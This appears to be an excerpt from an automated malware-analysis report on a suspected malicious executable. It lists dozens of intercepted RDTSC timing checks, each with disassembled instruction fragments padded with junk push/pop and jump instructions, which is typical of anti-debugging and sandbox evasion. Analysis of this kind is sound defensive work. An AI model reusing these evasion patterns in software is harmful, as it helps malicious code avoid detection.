              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FBF380 second address: FBF387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FC97F6 second address: FC9810 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F335931F154h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FC9810 second address: FC9833 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jng 00007F335854CBB6h 0x00000009 pop edx 0x0000000a pushad 0x0000000b jmp 00007F335854CBC6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F698CB second address: F698D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FC90D3 second address: FC90DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FC90DB second address: FC90E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FC90E1 second address: FC90E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FC9390 second address: FC93C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edi 0x00000007 jmp 00007F335931F14Bh 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 jnc 00007F335931F146h 0x00000017 popad 0x00000018 push edx 0x00000019 push esi 0x0000001a pop esi 0x0000001b jmp 00007F335931F14Ah 0x00000020 pop edx 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FCD22D second address: FCD23D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F335854CBBBh 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FCD23D second address: FCD27C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F335931F14Ch 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push esi 0x00000013 push eax 0x00000014 jl 00007F335931F146h 0x0000001a pop eax 0x0000001b pop esi 0x0000001c mov eax, dword ptr [eax] 0x0000001e jc 00007F335931F152h 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 pushad 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FCD32A second address: FCD32E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FCD32E second address: FCD33B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FCD33B second address: FCD341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FCD341 second address: FCD346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FCD46A second address: FCD479 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F335854CBBAh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FD2846 second address: FD2854 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FD2854 second address: FD2868 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F335854CBBBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FD2868 second address: FD286D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FD2B30 second address: FD2B43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F335854CBBDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FD2B43 second address: FD2B4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F335931F146h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FD2B4F second address: FD2B53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FD2B53 second address: FD2B57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FD2B57 second address: FD2B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F335854CBBAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jns 00007F335854CBBCh 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FD2B79 second address: FD2B97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F335931F155h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FD2B97 second address: FD2B9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FD2B9B second address: FD2BA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FD2BA4 second address: FD2BBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F335854CBBAh 0x0000000b popad 0x0000000c pushad 0x0000000d jg 00007F335854CBB6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FD2E7A second address: FD2E8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F335931F14Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FD2E8B second address: FD2E92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FD303C second address: FD3057 instructions: 0x00000000 rdtsc 0x00000002 js 00007F335931F155h 0x00000008 push edx 0x00000009 pop edx 0x0000000a jmp 00007F335931F14Dh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FD3057 second address: FD305B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FD305B second address: FD305F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FDA819 second address: FDA860 instructions: 0x00000000 rdtsc 0x00000002 js 00007F335854CBBEh 0x00000008 pushad 0x00000009 popad 0x0000000a jg 00007F335854CBB6h 0x00000010 pushad 0x00000011 push eax 0x00000012 pop eax 0x00000013 jmp 00007F335854CBC6h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b jnp 00007F335854CBE4h 0x00000021 jmp 00007F335854CBC2h 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FDB689 second address: FDB6A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335931F14Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FDB6A0 second address: FDB6AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FDB6AB second address: FDB6AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FDB6AF second address: FDB6B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FE070F second address: FE0738 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335931F152h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 pushad 0x00000012 popad 0x00000013 push edi 0x00000014 pop edi 0x00000015 jbe 00007F335931F146h 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FE0738 second address: FE073E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FE073E second address: FE0756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F335931F154h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FACE0E second address: FACE42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335854CBC8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c pop eax 0x0000000d popad 0x0000000e mov dword ptr [esp], esi 0x00000011 mov dword ptr [ebp+122D1DD9h], eax 0x00000017 push eax 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b jg 00007F335854CBB6h 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FAD0F6 second address: FAD0FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FAD0FC second address: FAD14F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F335854CBCBh 0x00000008 jmp 00007F335854CBC5h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F335854CBB8h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 0000001Ch 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c push 00000004h 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jg 00007F335854CBB8h 0x00000037 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FAD50B second address: FAD50F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FAD50F second address: FAD526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 jns 00007F335854CBB6h 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FAD80C second address: FAD812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FAD812 second address: FAD829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F335854CBBCh 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FAD829 second address: FAD82D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FAD82D second address: FAD833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FAD833 second address: FAD83D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F335931F146h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FAD83D second address: FAD857 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007F335854CBBCh 0x00000014 jnl 00007F335854CBB6h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FAD8F3 second address: FAD921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov dword ptr [esp], eax 0x00000008 xor cx, F6C1h 0x0000000d lea eax, dword ptr [ebp+12487314h] 0x00000013 mov dword ptr [ebp+122D207Ah], eax 0x00000019 nop 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F335931F150h 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FAD921 second address: FAD927 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FAD927 second address: FAD9AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F335931F151h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jnp 00007F335931F154h 0x00000014 nop 0x00000015 mov cx, di 0x00000018 pushad 0x00000019 and di, F411h 0x0000001e mov ecx, dword ptr [ebp+122D3A48h] 0x00000024 popad 0x00000025 lea eax, dword ptr [ebp+124872D0h] 0x0000002b push 00000000h 0x0000002d push ebp 0x0000002e call 00007F335931F148h 0x00000033 pop ebp 0x00000034 mov dword ptr [esp+04h], ebp 0x00000038 add dword ptr [esp+04h], 0000001Bh 0x00000040 inc ebp 0x00000041 push ebp 0x00000042 ret 0x00000043 pop ebp 0x00000044 ret 0x00000045 mov dword ptr [ebp+12465100h], esi 0x0000004b add ch, FFFFFF8Bh 0x0000004e nop 0x0000004f pushad 0x00000050 pushad 0x00000051 jbe 00007F335931F146h 0x00000057 pushad 0x00000058 popad 0x00000059 popad 0x0000005a push ebx 0x0000005b push edi 0x0000005c pop edi 0x0000005d pop ebx 0x0000005e popad 0x0000005f push eax 0x00000060 push edi 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FAD9AF second address: FAD9B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FAD9B3 second address: F8C60D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 nop 0x00000008 mov di, 6B5Ah 0x0000000c call dword ptr [ebp+122D3929h] 0x00000012 pushad 0x00000013 jbe 00007F335931F158h 0x00000019 jmp 00007F335931F14Ch 0x0000001e jg 00007F335931F146h 0x00000024 jmp 00007F335931F156h 0x00000029 push esi 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F8C60D second address: F8C62C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007F335854CBC7h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F702F4 second address: F702F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F702F8 second address: F70327 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F335854CBB6h 0x00000008 jp 00007F335854CBB6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F335854CBC4h 0x00000015 pushad 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 jo 00007F335854CBB6h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FE0D5E second address: FE0D65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FE1191 second address: FE11AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F335854CBC0h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FE11AA second address: FE11B0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FE11B0 second address: FE11B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FE1479 second address: FE14BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F335931F154h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c jmp 00007F335931F155h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F335931F153h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FE14BE second address: FE14C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FEB3D8 second address: FEB3DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FEB3DC second address: FEB3E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FEB3E2 second address: FEB40E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F335931F157h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F335931F14Ch 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FEB40E second address: FEB418 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F335854CBB6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FE9D96 second address: FE9DB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F335931F146h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jc 00007F335931F146h 0x00000015 jbe 00007F335931F146h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FE9DB1 second address: FE9DC9 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F335854CBB6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F335854CBBCh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FEA229 second address: FEA22F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FEA22F second address: FEA233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FEA3C1 second address: FEA3C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FEA3C7 second address: FEA3E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F335854CBC7h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FEA9A2 second address: FEA9B9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F335931F14Dh 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FEAB4A second address: FEAB4F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FEAE0E second address: FEAE2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F335931F146h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop ecx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 js 00007F335931F14Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FEAE2B second address: FEAE3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F335854CBBEh 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FEB257 second address: FEB270 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F335931F148h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F335931F14Bh 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FEB270 second address: FEB27A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F335854CBB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FEE70A second address: FEE72C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F335931F156h 0x00000009 jp 00007F335931F146h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FEDF9C second address: FEDFB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335854CBBDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FEDFB3 second address: FEDFB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FEE10C second address: FEE126 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F335854CBC0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
